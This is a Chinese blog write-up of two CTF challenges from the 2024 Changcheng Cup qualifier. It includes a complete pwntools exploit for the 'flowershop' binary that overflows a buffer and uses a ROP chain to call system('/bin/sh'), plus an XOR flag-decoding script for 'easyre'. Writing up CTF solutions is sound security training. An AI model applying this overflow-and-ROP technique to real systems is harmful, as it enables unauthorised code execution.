2024i春秋第四届长城杯网络安全大赛暨京津冀网络安全技能竞赛初赛wp-flowershop+easyre

已于 2024-09-10 21:06:53 修改
阅读量322 收藏 6
点赞数 3
文章标签: 安全 linux pwn 溢出 python ctf
于 2024-09-10 10:14:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64696290/article/details/142089589
版权

flowershop

在这里插入图片描述

如图所示,v8是钱的数量,strncpy从src复制三个字符给dest的数组里,最后一个元素是0,相当于字符串截断,strcmp是比较c和dest中的内容,如果相等就不会exit(0);双击c进去看,c是字符串“pwn”,所以我们在read溢出的时候,把src覆盖成”pwn/x00”就可以绕过检测,后面的v8就可以随便覆盖八字节,充值任意的钱数。

接下里我们再进行购物,可见shop传入的v5有三个元素,我们再进shop函数看看:
通过分析就可以看到,这三个元素对应了每个商品购买的数量,每次买一个商品,对应的元素就会加1,每件商品最多买8个

此时末位有个read,很可能就是我们要溢出的漏洞,但是参数v4可控未知,所以往前可看check函数做了什么,显然通过分析这就是满足买了两件a商品和1件b商品的时候就可以给a2指针赋值为70,指向的就是v4,这样shop函数的buf只有10字节,但是read可以输入70字节,就达到了溢出攻击条件

在这里插入图片描述

所以最后我们通过购买c商品,达到给magic赋值”/bin/sh”的目的,所有条件已达成,

在这里插入图片描述

值得注意的是最后赋值钱的时候八字节的最高位不能是1,因为这是符号位,如果是1就是负数了,最后read也不一定要追加到70个字节,能溢出执行system即可了。

from pwn import *
#p=remote("8.147.134.241",24158)
p=process("./pwn")
system=0x400D7A
magic=0x601840
pop_rdi=0x400f13
ret=0x4006f6
payload=b'a'*52+b'pwn\x00'+b'\xff\xff\xff\x7f\xff'
p.send(payload)
p.recvuntil("你的选项:")
p.sendline("a")
p.recvuntil("商品序号:\n")
p.sendline("a")
p.sendline("1")

p.recvuntil("商品序号:\n")
p.sendline("a")
p.sendline("1")

p.recvuntil("商品序号:\n")
p.sendline("b")
p.sendline("1")

p.recvuntil("商品序号:\n")
p.sendline("c")

payload=(b'a'*24+p64(pop_rdi)+p64(magic)+p64(system))
p.recvuntil('1/0')
p.sendline(payload)

p.interactive()

ps:我用的是IDA8.3free版本

easyre

flag=[0x0A, 0x0D, 0x06, 0x1C, 0x1D, 0x05, 0x05, 0x5F, 0x0D, 0x03, 
  0x04, 0x0A, 0x14, 0x49, 0x05, 0x57, 0x00, 0x1B, 0x19, 0x02, 
  0x01, 0x54, 0x4E, 0x4C, 0x56, 0x00, 0x51, 0x4B, 0x4F, 0x57, 
  0x05, 0x54, 0x55, 0x03, 0x53, 0x57, 0x01, 0x03, 0x07, 0x04, 
  0x4A, 0x77]
     
for i in range(len(flag)-1,-1,-1):
    flag [i]^= flag [(i+1)%len(flag)]
    
print(bytes(flag))

分析算法异或运算,提取数据
在这里插入图片描述

这段代码使用了C语言和汇编语言的混合语法,通常用于底层编程,比如逆向工程或者对性能要求很高的应用。这段代码可能来自一个编译后的二进制文件,并且很可能是针对x86-64架构的,因为它使用了诸如_mm_movemask_epi8等内联汇编的SSE指令。
代码分析:

  1. 函数签名:
    o __fastcall:这是一个调用约定,它将前两个参数放在寄存器中(RCX, RDX),而不是在堆栈上。
    o main:这是程序的入口点,不过这里被修改为__fastcall调用方式。
    o argc、argv、envp:这是标准的main函数参数,分别表示参数数量、参数值以及环境指针。
  2. 变量:
    o v3:一个指向__m128i类型的指针,这是一种128位的SIMD寄存器数据类型,通常用于SSE(流式SIMD扩展)。
    o v4、i、v6:64位整数变量,用于循环和其他操作。
  3. 逻辑流程:
    o 如果命令行参数的数量小于等于1,程序将退出(argc <= 1)。
    o v3被初始化为指向第一个命令行参数(argv[1]),接下来程序准备进行一些SIMD操作。
    o 一个循环运行43次,每次通过异或(XOR)操作对__m128i寄存器v3中的每个字节进行处理,这看起来像是一种混淆或加密操作。
    o 循环结束后,程序使用SIMD指令(_mm_cmpeq_epi8和_mm_and_si128)进行比较,将v3的内容与特定内存位置(xmmword_140021410和xmmword_140021400)的值进行比对。
    o 如果比较成功,程序调用函数sub_1400011A0并将结果传递给另一个函数sub_1400015A0。
    观察:
    • 这段代码似乎是在检查输入(可能是命令行参数)是否与某个特定值相匹配,可能是用于验证密码或者在某种挑战中验证flag。
    • SIMD指令的使用表明,该比较操作经过优化,能够一次性比较多个字节,提升性能。
    • 虽然函数sub_1400011A0和sub_1400015A0的定义没有给出,但它们可能与验证过程有关,可能在输入匹配时显示某些信息。

在这里插入图片描述

在这里插入图片描述

复盘
全wp

是乙太呀
关注
2024长城杯初赛 部分wp
2301_80185313的博客
09-08 892
2024长城杯初赛 部分misc和web wp
第四届长城杯网络安全大赛 京津冀网络安全技能竞赛初赛) 全方向 题解WriteUp
Jay17的博客
09-09 1716
第四届长城杯网络安全大赛 京津冀网络安全技能竞赛初赛) 全方向 题解WriteUp
2024长城杯初赛部分题解[crypto]
ljc13626678577的博客
04-01 1636
你真的了解RSA吗,Problem两题wp
长城杯线上赛WP
蚁景网安学院
09-28 982
本文为goodcat战队参赛wp,非官方出品Pwn1、 K1ng_in_h3Ap_II libc2.27-0ubuntu1.4,存在明显的UAF;tcahce double free 控...
记一道rsa题---第一届“长城杯网络安全大赛
Luiino的博客
10-19 810
且n =fac[0]*fac[1]*fac[2]*(((fac[0]+fac[1]+fac[2])
2024长城杯“-HTTPAttackFlow流量分析题(附题目)
xiaochaochao122的博客
04-01 631
pwd=wkur。
2021绿城杯pwn部分wp
eeeeeight的博客
09-29 1180
前言: 这次比赛了解到了还有jspwn这玩意, 然后没时间学(, 十月一定(逃) uafpwn: 释放之后指针未置零, 所以use after free乱打 from pwn import * context(log_level = 'debug', arch = 'amd64') # sh = process('./uaf_pwn') sh = remote('82.157.5.28', 52102) elf = ELF('./uaf_pwn') libc = elf.libc def add(siz
长城杯线下赛赛后复现
fmyyy1的博客
10-14 1243
长城杯线下赛赛后复现 前言 去打了长城杯决赛,结果全程坐牢,果然不联网的web太难了,赛后拿到了两个web靶机的wp,复现一下。 fancyapi 目录结构 逻辑很简单,web用的是python的flask框架,然后go写了几个接口处理数据。 看看backend.go func Flag(w http.ResponseWriter, r *http.Request ) { action:= r.URL.Query().Get("action") if action == "" { fail(w,
2024长城杯铁人三项, Python代码分析题crypto WP
xingmiao0的博客
04-02 929
temp = (x * flag中的每个字符的十进制ascii码值 + y) % 251。
2024长城杯部分wp
roma_road的博客
09-09 190
依次打开发现index(3)为哥斯拉木马文件,index(6)和index无法打开,将其丢入工具中分离。发现index(6)中包含压缩包,压缩包中包含flag.txt文件。哥斯拉木马是通过MD5加密,因此找到MD5解密网站即可得到flag。下载附件发现是pcapng文件,打开wireshark进行抓包。筛选出http协议,发现包含flag.txt文件,将其导出。未碰撞出的可用其他网站继续破解,最后得出flag。木马文件的pass即为压缩包的密码。完成游戏即可获得flag。
第一届长城杯 第三赛区 半决赛 AWD 源码
04-23
【标题】"第一届长城杯 第三赛区 半决赛 AWD 源码"指的是一个编程竞赛的源代码,很可能是参赛队伍在半决赛阶段使用的自动武器动态(AWD)系统的代码。这个标题揭示了这是一个与软件开发竞赛相关的内容,特别关注的是...
长城杯-钢筋施工方案.doc
04-22
长城杯钢筋施工方案】 本方案详细阐述了某钢筋施工项目的各个环节,旨在为参与长城杯工程质量评审的工程提供规范和指导。以下将针对方案的主要内容进行解析: 一、编制依据: 施工方案的制定遵循了一系列的专业...
长城杯-混凝土工程.doc
04-22
长城杯混凝土工程】是建筑工程中的一个重要奖项,其对混凝土施工的质量要求极高。这份文档详细阐述了某混凝土工程的施工方案,遵循了多项国家及行业标准,如《混凝土结构工程施工质量验收规范》GB50204-2002、《混...
2022-长城杯初赛Write up-by EchoSec安全团队
echosec的博客
08-29 2285
EchoSec安全团队参加的首场比赛,在各位师傅们的输出下,也拿到第8名的成绩,虽然不算特别好,也是EchoSec安全团队迈出的第一步。同时欢迎各位有兴趣的师傅加入我们,一起学习进步。可+v:He1l_T4lk。...
2022年网络安全国赛内存取证WP
旺仔Sec&blog
07-18 2242
2022年网络安全国赛内存取证WP
2024长城杯-第五场-流量分析wp
qq_67760645的博客
04-11 1433
查看了一下流量包里的协议包,发现只有TLS协议进行了加密。使用冰蝎4.0自带的解密脚本进行解密,协议名称那里根据前面发现的代码判断出是xor+base64。先把这段数据放入冰蝎进行解密,然后把这个cmd变量的这段base64进行解码,发现将这段串数字输入到文件中,文件名带有passwd。得到了flag{Keep_going_jpg},但是这个flag是错误的。但是这个flag里面的内容就是图片的文件名+文件后缀。说明解题还是看这个图片。查看那个key文件,拖入十六进制查看工具发现这个是RSA加密的key。
第四届长城杯”信息安全铁人三项赛 Junk&&language
Todog的博客
03-24 971
xxx
2021 长城杯ctf wp
qq_45603443的博客
09-20 5075
2021 长城杯 wpMisc签到你这flag保熟吗Cryptobaby_rsaReverseJust_cmpfunny_jsWebjava_urlez_pythonPwnK1ng_in_h3Ap_IK1ng_in_h3Ap_II Misc 签到 ASCII—16进制—base64 你这flag保熟吗 下载附件,得到两张图⽚和⼀个压缩包,压缩包需要密码 从图⽚可以提取出两个rar 得到⼀个excel和⼀个hint hint中提示base64:(,还有⼀串不知所云的base64 excel中是分开来的单
时间&安全精细化管理平台存在未授权访问漏洞
最新发布
2301_77012231的博客
09-14 297
登录--时间&安全精细化管理平台存在未授权访问漏洞导致与员工信息泄露。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

是乙太呀

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值